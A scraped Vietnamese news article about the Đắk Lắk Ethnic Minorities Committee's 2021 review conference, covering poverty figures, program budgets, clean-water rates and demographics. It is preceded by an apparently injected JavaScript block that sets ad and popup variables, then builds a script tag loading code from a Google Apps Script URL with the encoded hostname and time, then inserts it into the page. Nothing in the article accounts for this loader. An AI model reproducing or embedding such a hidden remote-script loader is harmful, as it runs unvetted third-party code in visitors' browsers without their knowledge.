var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Ban Dân tộc Đắk Lắk tổng kết công tác dân tộc năm 2021

Ban Dân tộc Đắk Lắk tổ chức Hội nghị trực tuyến Tổng kết công tác dân tộc năm 2021
Ban Dân tộc Đắk Lắk tổ chức Hội nghị trực tuyến Tổng kết công tác dân tộc năm 2021

Ông Lê Ngọc Vinh, Phó trưởng Ban Dân tộc, thông báo trong báo cáo tại Hội nghị rằng Ban Dân tộc Đắk Lắk đã đưa ra nhiều văn bản quy định và hướng dẫn chi tiết về từng nội dung và chính sách trong năm 2021. Mặc dù tình hình dịch Covid-19 phức tạp, công tác dân tộc và thực hiện chính sách dân tộc của tỉnh đã đạt được nhiều kết quả tích cực nhờ sự quan tâm của lãnh đạo tỉnh và sự phối hợp của các ngành và cấp. Tỉ lệ hộ nghèo toàn tỉnh đã giảm xuống còn 7,91%.

Năm 2021, ngân sách tỉnh dành để thực hiện Chương trình MTQG phát triển kinh tế xã hội vùng đồng bào DTTS và miền núi là 18 tỷ đồng. Tổng nguồn vốn được kết hợp từ các chương trình, chính sách, đề án, dự án đầu tư có cùng mục tiêu cho vùng DTTS&MN ước tính khoảng 1.270 tỷ đồng.

Các chương trình mục tiêu quốc gia nhằm giảm nghèo bền vững, xây dựng nông thôn mới, cải thiện giáo dục, y tế, văn hóa – xã hội đã được triển khai đồng bộ và hiệu quả. Hệ thống trường học đã được tu sửa và xây dựng mới để đáp ứng nhu cầu học tập của học sinh. Tỷ lệ hộ dân tộc thiểu số nông thôn sử dụng nước vệ sinh đạt 92,2%, trong đó tỷ lệ sử dụng nước sạch là 9,8% và tỷ lệ sử dụng nước hợp vệ sinh đạt 82,3%. Công tác bảo tồn, giữ gìn và phát huy bản sắc văn hóa truyền thống của các dân tộc đã được đồng bào ủng hộ và thực hiện hiệu quả.

Ngoài ra, công tác tuyên truyền và giáo dục pháp luật cho cộng đồng vùng DTTS ngày càng được cập nhật về nội dung và hình thức. Đồng thời, việc bảo tồn và phát huy bản sắc văn hoá truyền thống của các dân tộc cũng nhận được sự quan tâm và đầu tư. Các chương trình và chính sách giảm nghèo bền vững được triển khai đồng bộ thông qua các dự án tại các địa phương. Đời sống vật chất và tinh thần của người dân thiểu số trên địa bàn cũng được cải thiện, đồng thời an ninh chính trị và trật tự an toàn xã hội ở vùng DTTS được duy trì vững chắc và ổn định.

Ngoài ra, Ban Dân tộc Đắk Lắk cũng tổ chức viếng thăm, động viên và cung cấp hỗ trợ ngay lập tức cho 67 gia đình đồng bào DTTS không may gặp phải thiên tai, hỏa hoạn và tai nạn.

Năm 2022, Ban Dân tộc Đắk Lắk sẽ tiếp tục tập trung vào công tác tuyên truyền và vận động đồng bào DTTS về chủ trương của Đảng và chính sách pháp luật của nhà nước. Chúng ta cũng sẽ nâng cao nhận thức và ý thức chấp hành pháp luật của đồng bào DTTS. Đồng thời, chúng ta sẽ tự tin nắm bắt tình hình an ninh chính trị, trật tự an toàn xã hội và đời sống, sản xuất trong vùng đồng bào DTTS. Chúng ta sẽ tham mưu và giải quyết các vấn đề phát sinh, giảm tranh chấp và khiếu kiện để ổn định vùng đồng bào DTTS. Bên cạnh đó, chúng ta sẽ tổ chức thăm hỏi và động viên tinh thần những người có uy tín trong đồng bào DTTS, hỗ trợ những người gặp khó khăn do thiên tai, tai nạn lao động trên địa bàn tỉnh. Chúng ta cũng sẽ chăm sóc những người trong đồng bào DTTS bị tử vong hoặc mắc bệnh COVID-19.

Đặc biệt, việc triển khai Chương trình MTQG phát triển kinh tế – xã hội vùng đồng bào DTTS và miền núi giai đoạn 2021- 2025 đã đạt hiệu quả sau khi các bộ, ngành Trung ương cung cấp hướng dẫn và phân bổ nguồn vốn. Đồng thời, công tác kiểm tra và đôn đốc triển khai các chương trình, dự án, chính sách dân tộc tại cơ sở đã được thực hiện để giải quyết kịp thời các vướng mắc, khắc phục những hạn chế và đẩy nhanh tiến độ thực hiện các chính sách dân tộc.

Tỉnh Đắk Lắk đang có sự góp mặt của 49 dân tộc khác nhau. Trong tỉnh, nhóm dân tộc DTTS chiếm tỷ lệ 35,7% dân số. Trong giai đoạn 2021-2025, Đắk Lắk sẽ được chia thành 54 xã thuộc Khu vực III, 5 xã thuộc Khu vực II, và 71 xã, phường, thị trấn thuộc Khu vực I. Ngoài ra, còn tồn tại 519 thôn ĐBKK ở vùng đồng bào DTTS và miền núi. Hiện tại, tỉnh có tổng cộng 496.387 hộ, trong đó có 154.144 hộ thuộc dân tộc DTTS.